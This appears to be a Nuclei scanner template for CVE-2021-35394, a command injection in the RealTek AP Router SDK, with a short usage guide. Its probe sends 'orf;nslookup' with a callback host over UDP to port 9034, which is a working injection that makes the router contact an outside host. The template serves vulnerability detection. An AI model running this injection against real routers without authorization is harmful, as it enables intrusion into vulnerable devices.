RealTek AP Router SDK - Arbitrary Command Injection
ID: CVE-2021-35394
Severity: critical
Author: king-alexander
Tags: cve,cve2021,realtek,rce,kev
Description
The SDK exposes a UDP server that allows remote execution of arbitrary commands.
YAML Source
id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);

    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 490a0046304402202653f3caae379b8d6253e7b31c2627077a285c4345b3ebbb678cd447fd7b398f022041cb6f9a7593d51271e193d8fd866e6d948bc7b3f88115b07c5b12dceeb158d6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This is a Nuclei template for detecting the vulnerability described above. Run it with the Nuclei scanner against a target host; the template sends its probe to the UDP service on port 9034 and reports a match when the interactsh callback records a DNS interaction.
$ nuclei -u "URL" -t "javascript/cves/2021/CVE-2021-35394.yaml"